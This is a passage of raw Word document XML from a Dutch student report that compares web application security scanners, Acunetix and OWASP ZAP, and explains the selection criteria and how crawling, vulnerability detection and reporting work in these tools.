        <w:t>ools zijn hierin gespecialiseerd.</w:t>
      </w:r>
      <w:r w:rsidR="00EE7F64">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2D3145" w14:textId="75BD4787" w:rsidR="002D52EB" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t>In dit deel zal ik ond</w:t>
      </w:r>
      <w:r w:rsidR="00C73654">
        <w:t>erzoek doen naar een aantal DAS</w:t>
      </w:r>
      <w:r w:rsidR="00793C9E">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>tools om inzicht te krijgen in de werkwijze van de verschillende scanners. Ieder scanner verschilt in omvang, scan proces, software architectuur, het analytische vermogen,</w:t>
      </w:r>
      <w:r w:rsidR="00095DD0">
        <w:t xml:space="preserve"> de wijze van rapporteren, etc.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Het is interessant om een aantal</w:t>
      </w:r>
      <w:r w:rsidR="006E4F41">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB5623">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanners</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> te bestuderen om zo hun werkwijze te leren kennen. Dit zal mij nieuwe inzichten bieden en zal mij helpen mijn eigen </w:t>
      </w:r>
      <w:r w:rsidR="00B47C14">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> te verbeteren.</w:t>
      </w:r>
      <w:r w:rsidR="00365791">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E4F41">
        <w:t xml:space="preserve">Ook </w:t>
      </w:r>
      <w:r w:rsidR="00365791">
        <w:t>zal</w:t>
      </w:r>
      <w:r w:rsidR="006E4F41">
        <w:t xml:space="preserve"> ik</w:t>
      </w:r>
      <w:r w:rsidR="00C46C93">
        <w:t xml:space="preserve"> kijken</w:t>
      </w:r>
      <w:r w:rsidR="00365791">
        <w:t xml:space="preserve"> naar de </w:t>
      </w:r>
      <w:r w:rsidR="00ED54A6">
        <w:t xml:space="preserve">fundamentele aspecten </w:t>
      </w:r>
      <w:r w:rsidR="006E4F41">
        <w:t xml:space="preserve">waaruit een </w:t>
      </w:r>
      <w:r w:rsidR="00B65E91">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="006E4F41">
        <w:t xml:space="preserve"> gebouwd is. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D196A" w14:textId="0A82ACC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Ik heb drie eisen opgest</w:t>
      </w:r>
      <w:r w:rsidR="00EA357A">
        <w:t>eld voor het selectieproces, 1)</w:t>
      </w:r>
      <w:r w:rsidR="00A63EA8">
        <w:t xml:space="preserve"> beide</w:t>
      </w:r>
      <w:r w:rsidR="00EA357A">
        <w:t xml:space="preserve"> moeten voorloper </w:t>
      </w:r>
      <w:r w:rsidR="00244B61">
        <w:t>zijn op gebied van DAS</w:t>
      </w:r>
      <w:r w:rsidR="00793C9E">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00085003">
        <w:t>tools en 2) het moeten goed gedocumenteer</w:t>
      </w:r>
      <w:r w:rsidR="00EF4D9D">
        <w:t xml:space="preserve">de tools zijn en als laatste 3) </w:t>
      </w:r>
      <w:r w:rsidR="007531F3">
        <w:t>de tool moet makkelijk te verkrijgen zijn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0146DD77" w14:textId="21304756" w:rsidR="000D6E12" w:rsidRDefault="00EF4415" w:rsidP="00554FF4">
      <w:r>
        <w:t>De eisen dienen als regels die het zoeken naar een geschikte</w:t>
      </w:r>
      <w:r w:rsidR="00FC6B4B">
        <w:t xml:space="preserve"> webapplicatie scanner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00215E17">
        <w:t xml:space="preserve">vereenvoudigd. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44708ACD" w14:textId="73E5719A" w:rsidR="00465CE3" w:rsidRDefault="00465CE3" w:rsidP="00554FF4">
      <w:r>
        <w:t>Regels</w:t>
      </w:r>
      <w:r w:rsidR="00A825F1">
        <w:t>/eisen uitgelegd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0DA59" w14:textId="24984479" w:rsidR="00A825F1" w:rsidRDefault="00650BF0" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Webapplicatie scanners</w:t>
      </w:r>
      <w:r w:rsidR="00F13F9C">
        <w:t xml:space="preserve"> die goed onderhouden worden met de laatste technologische vooruitgangen kan mij meer inzicht bieden dan een verouderde tool. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BE9CD0" w14:textId="1F6F5136" w:rsidR="00F13F9C" w:rsidRDefault="00DC47A7" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Goed gedocumenteerde tools bieden mij meer informatie aan over de werking van de tool voor mijn onderzoek.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D80AFE8" w14:textId="067075BB" w:rsidR="00DC47A7" w:rsidRDefault="00755D40" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Met </w:t>
      </w:r>
      <w:r w:rsidR="00996EC7">
        <w:t>tools die gemakkelijk verkrijgbaar zijn bedoel ik dat er geen hele registratie proces en goedkeuring vooraf moet gaan voordat ik er echt gebruik van kan maken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAC04B3" w14:textId="6597002A" w:rsidR="002D52EB" w:rsidRDefault="002D52EB"/>
    <w:p w14:paraId="2F46C309" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00BA13E5"/>
    <w:p w14:paraId="48B4EDC9" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00BA13E5"/>
    <w:p w14:paraId="601316BA" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00BA13E5"/>
    <w:p w14:paraId="575BCE30" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00BA13E5"/>
    <w:p w14:paraId="57D04CFD" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00BA13E5"/>
    <w:p w14:paraId="5DEE5041" w14:textId="54DC0DB8" w:rsidR="00A35EEC" w:rsidRDefault="00394B19" w:rsidP="00BA13E5">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252154880" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02AF27F0" wp14:editId="6639F09B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-901700</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-3005394</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="490" name="Rectangle 49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1FE0C" id="Rectangle 490" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71pt;margin-top:-236.6pt;width:25pt;height:1031.7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MvZs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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009F3C2E">
        <w:t xml:space="preserve">Uit het onderzoek van </w:t>
      </w:r>
      <w:r w:rsidR="00197537">
        <w:t xml:space="preserve">deel 3.4.2 </w:t>
      </w:r>
      <w:r w:rsidR="00EA41A1">
        <w:t>heb ik ee</w:t>
      </w:r>
      <w:r w:rsidR="008A440E">
        <w:t>n selectie gemaakt van twee DAS</w:t>
      </w:r>
      <w:r w:rsidR="00793C9E">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00EA41A1">
        <w:t>tools. Deze tools zal ik in de komende delen onderzoeken. Hiervoor zal ik de tools uitproberen en de werking documenteren, de documentatie doornemen en onderzoeken wat voor datastructuur zij gebruiken</w:t>
      </w:r>
      <w:r w:rsidR="004B0DA7">
        <w:t xml:space="preserve"> en</w:t>
      </w:r>
      <w:r w:rsidR="00EA41A1">
        <w:t xml:space="preserve"> wat zij aan data verzamelen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29288551" w14:textId="77777777" w:rsidR="00BA13E5" w:rsidRDefault="00BA13E5" w:rsidP="00BA13E5">
      <w:r>
        <w:t>De scanners die ik voor dit deel heb gekozen zijn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128F5071" w14:textId="77777777" w:rsidR="00BA13E5" w:rsidRDefault="00BA13E5" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0DB4A0" w14:textId="77777777" w:rsidR="00BA13E5" w:rsidRDefault="00BA13E5" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ZAP Zed Attack Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C594E96" w14:textId="540D02A0" w:rsidR="00BA13E5" w:rsidRDefault="00BA13E5" w:rsidP="00554FF4">
      <w:r>
        <w:t>Ik zal in dit onderzoek twee documenten behandelen: Acunetix</w:t>
      </w:r>
      <w:r w:rsidR="0063185D">
        <w:t xml:space="preserve"> handleiding</w:t>
      </w:r>
      <w:r w:rsidR="00364A1D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00AD27D9">
        <w:t xml:space="preserve">deze </w:t>
      </w:r>
      <w:r w:rsidR="00121125">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00364A1D">
        <w:t>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w:t>
      </w:r>
      <w:r w:rsidR="00793C9E">
        <w:t>erking van beide DAS-</w:t>
      </w:r>
      <w:r>
        <w:t>tools</w:t>
      </w:r>
      <w:r w:rsidR="00133B9F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548A89C4" w14:textId="2D933C5B" w:rsidR="00554FF4" w:rsidRDefault="00027DBB" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Acunetix vermeld </w:t>
      </w:r>
      <w:r w:rsidR="00FB31ED">
        <w:t>dat e</w:t>
      </w:r>
      <w:r w:rsidR="00A87CE5">
        <w:t>en DAS</w:t>
      </w:r>
      <w:r w:rsidR="00793C9E">
        <w:t xml:space="preserve">-tool </w:t>
      </w:r>
      <w:r w:rsidR="00554FF4">
        <w:t>drie kern processen</w:t>
      </w:r>
      <w:r w:rsidR="00793C9E">
        <w:t xml:space="preserve"> heeft</w:t>
      </w:r>
      <w:r w:rsidR="00554FF4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D3F679" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00FB7402" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7402">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Crawl &amp; Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA36ABB" w14:textId="79C34ED0" w:rsidR="00554FF4" w:rsidRPr="00B64C80" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r w:rsidRPr="00B64C80">
        <w:t xml:space="preserve">Voordat er gescand kan worden moeten er eerst resources worden opgehaald. </w:t>
      </w:r>
      <w:r>
        <w:t>De crawler zorgt daarv</w:t>
      </w:r>
      <w:r w:rsidR="00776AC3">
        <w:t xml:space="preserve">oor door </w:t>
      </w:r>
      <w:r w:rsidR="00A40960">
        <w:t xml:space="preserve">delen van een html </w:t>
      </w:r>
      <w:r>
        <w:t>pagina te scrapen. Scrapen is het proces van het selectief uitknippen van html elementen zoals de anchor tag &lt;a&gt;, wat als attribuut een hyperlink</w:t>
      </w:r>
      <w:r w:rsidR="005503B2">
        <w:t xml:space="preserve"> heeft</w:t>
      </w:r>
      <w:r>
        <w:t>. Wanneer er voldoende gecrawld is</w:t>
      </w:r>
      <w:r w:rsidR="00A873BC">
        <w:t xml:space="preserve"> kan een scan gestart worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67425B8D" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00FB7402" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7402">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Detect &amp; Alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BF2555" w14:textId="00CA4C30" w:rsidR="00554FF4" w:rsidRPr="00B64C80" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t>Bij het detecteren van kwetsbaarheden is precisie dat telt. Tijd</w:t>
      </w:r>
      <w:r w:rsidR="00B03B9A">
        <w:t xml:space="preserve">ens een scan probeert de </w:t>
      </w:r>
      <w:r w:rsidR="005079A2">
        <w:t>DAS</w:t>
      </w:r>
      <w:r w:rsidR="003F6E96">
        <w:t>-tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kwetsbaarheden in een </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> te detecteren.</w:t>
      </w:r>
      <w:r w:rsidR="00A45779">
        <w:t xml:space="preserve"> Voor het</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> meten hoe goed en accuraat een </w:t>
      </w:r>
      <w:r w:rsidR="005079A2">
        <w:t>DAS</w:t>
      </w:r>
      <w:r w:rsidR="003F6E96">
        <w:t>-tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kwetsbaarheden detecteert kan de OWASP Benchm</w:t>
      </w:r>
      <w:r w:rsidR="004D080F">
        <w:t>ark gebruikt worden.</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1FE88D8F" w:rsidR="00554FF4" w:rsidRPr="00723BE8" w:rsidRDefault="00394B19" w:rsidP="0013783D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252156928" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="181FD6B1" wp14:editId="019966D0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-2892364</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="491" name="Rectangle 49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74CF0" id="Rectangle 491" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.6pt;margin-top:-227.7pt;width:25pt;height:1031.7pt;z-index:-2511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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0013783D">
        <w:t>3.4</w:t>
      </w:r>
      <w:r w:rsidR="00796FC3">
        <w:t>.4</w:t>
      </w:r>
      <w:r w:rsidR="00740679" w:rsidRPr="00723BE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00554FF4" w:rsidRPr="00723BE8">
        <w:t>Acunetix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE82206" w14:textId="17014921" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Volgens een </w:t>
      </w:r>
      <w:r w:rsidR="00A4747D">
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> van Acunetic heeft 70% van alle websites een kwetsbaarheid dat kan leiden tot diefstal van gevoelige data [Acunetix </w:t>
      </w:r>
      <w:r w:rsidR="003D7DBF">
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">]. Acunetix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t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>webapplicatie scanner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> die ik ontwikkel op zal focussen. Een ander punt die Acunetix maakt is dat </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t>s 24/7 toegankelijk zijn en dat zij controle hebben over kostbare data omdat zij, als het niet via een API gaat, in de meeste gevallen directe contact hebben met de backend, hoe anders moeten zij aan de data komen</w:t>
      </w:r>
      <w:r w:rsidR="00D94192">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Verder</w:t>
      </w:r>
      <w:r w:rsidR="00261EC6">
        <w:t xml:space="preserve"> vermeld Acunetix in het document dat </w:t>
      </w:r>
      <w:r w:rsidR="00B92C98">
        <w:t>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r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Acunetix W</w:t>
      </w:r>
      <w:r w:rsidR="00DA6DF8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8E5722" w14:textId="3A25C049"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versie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ik zal in dit deel de </w:t>
      </w:r>
      <w:r w:rsidR="00C2414C">
        <w:t>web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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Het confi</w:t>
      </w:r>
      <w:r w:rsidR="003F19EA">
        <w:t>gureren en beheren van websites die als targets (Doelwitten) worden ingevoerd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6588F30D" w14:textId="00F233E8" w:rsidR="003F19EA" w:rsidRDefault="00C41654" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00D824A4">
        <w:t xml:space="preserve">et starten van een </w:t>
      </w:r>
      <w:r w:rsidR="00F630DE">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="00D824A4">
        <w:t>scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4478B8CF" w14:textId="0A642B91" w:rsidR="003F19EA" w:rsidRDefault="00C41654" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="003F19EA">
        <w:t>et bekijken van statistieken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354EA4CD" w14:textId="337CB6BD" w:rsidR="003F19EA" w:rsidRDefault="00C41654" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="009A6435">
        <w:t>enereren van een rapport</w:t>
      </w:r>
      <w:r w:rsidR="00F6398E">
        <w:t xml:space="preserve"> wat gebaseerd is op de kwetsbaarheden die gevonden zijn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72362C82" w14:textId="1BA9826E" w:rsidR="00CE696B" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t>Verder zijn er nog andere kleinere taken zoal</w:t>
      </w:r>
      <w:r w:rsidR="00F20C9A">
        <w:t>s het beheren van het gebruikers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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288E53A6" w:rsidR="00CE696B" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t>In de Crawl tab staan alle opties voor het instellen van de crawler, een crawler zorgt ervoor dat de benodigde informatie wordt verzameld voor de scan. Zoals de hyp</w:t>
      </w:r>
      <w:r w:rsidR="000E0788">
        <w:t>erlinks en formulieren. De HTTP-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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2C789A83"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w:t>
      </w:r>
      <w:r w:rsidR="00C23357">
        <w:t xml:space="preserve"> template kiezen</w:t>
      </w:r>
      <w:r w:rsidR="00830D50">
        <w:t>, hiermee kan</w:t>
      </w:r>
      <w:r w:rsidR="00C23357">
        <w:t xml:space="preserve"> de thema e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">n doelgroep van het </w:t>
      </w:r>
      <w:r w:rsidR="00830D50">
        <w:t>rapport bepaald worden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CC61E4" w14:textId="77777777" w:rsidR="00A12588" w:rsidRDefault="00A12588" w:rsidP="00554FF4"/>
    <w:p w14:paraId="53079C16" w14:textId="77777777" w:rsidR="00BA2E92" w:rsidRDefault="00BA2E92" w:rsidP="00554FF4"/>
    <w:p w14:paraId="381FC7CA" w14:textId="77777777" w:rsidR="00CC03C1" w:rsidRPr="00CB3E4B" w:rsidRDefault="00CC03C1" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7578EBCE" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00260084">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFB3858" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00260084">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52AD6135" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00260084">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607714E7" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00260084">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5369DC46" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00260084">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F345B06" w14:textId="30CB5F50" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00260084">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252158976" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46B7772B" wp14:editId="17BBA1E0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-899795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-3001802</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13112593"/>
                <wp:effectExtent l="0" t="0" r="38100" b="19685"/>
                <wp:wrapNone/>
                <wp:docPr id="492" name="Rectangle 492"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="317500" cy="13112593"/>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B47F4" id="Rectangle 492" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.85pt;margin-top:-236.3pt;width:25pt;height:1032.5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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D9BD1A" w14:textId="042C4122" w:rsidR="00554FF4" w:rsidRPr="00723BE8" w:rsidRDefault="00260084" w:rsidP="00260084">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>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p>
    <w:p w14:paraId="69384D4F" w14:textId="2C00971C"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w:t>
      </w:r>
      <w:r w:rsidR="00EF4B63">
        <w:t xml:space="preserve">van de website van OWASP en </w:t>
      </w:r>
      <w:r>
        <w:t>biedt</w:t>
      </w:r>
      <w:r w:rsidR="00EF4B63">
        <w:t xml:space="preserve"> ook</w:t>
      </w:r>
      <w:r w:rsidR="00D34B48">
        <w:t xml:space="preserve"> OWASP-</w:t>
      </w:r>
      <w:r>
        <w:t>pro</w:t>
      </w:r>
      <w:r w:rsidR="00D34B48">
        <w:t>ject samenwerking voor software-</w:t>
      </w:r>
      <w:r>
        <w:t>ontwikkelaars</w:t>
      </w:r>
      <w:r w:rsidR="00D34B48">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> die een bijdrage willen maken door te werken aan nieuwe features voor de applicatie. Het project is open-source wat beteken</w:t>
      </w:r>
      <w:r w:rsidR="00D34B48">
        <w:t>t dat OWASP de broncode publiekelijk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> heeft vrijgegeven. Het project kan worden gedownload op Github hiervoor het een </w:t>
      </w:r>
      <w:r w:rsidR="00E90D9A">
        <w:t>software</w:t>
      </w:r>
      <w:r w:rsidR="00D34B48">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00E90D9A">
        <w:t>ontwikkelaar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> geen toestemming voor nodig. Met een simpele git clone wordt er een kopie van het hele project op jouw computer geplaats. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFAB8C0" w14:textId="17062DC6"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w:t>
      </w:r>
      <w:r w:rsidR="00353509">
        <w:t xml:space="preserve"> To exploit or not to exploit.</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0FFE28F1" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Het systeem is gescand en geanalyseerd voor </w:t>
      </w:r>
      <w:r w:rsidR="00E90D9A">
        <w:t>security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4F3E8143" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Het doel van het document is natuurlijk om een introductie te maken voor OWASP ZAP. Ik heb eerder al een aantal dingen verteld over de </w:t>
      </w:r>
      <w:r w:rsidR="00D31B78">
        <w:t>DAS</w:t>
      </w:r>
      <w:r w:rsidR="00D90FF1">
        <w:t>-tool</w:t>
      </w:r>
      <w:r>
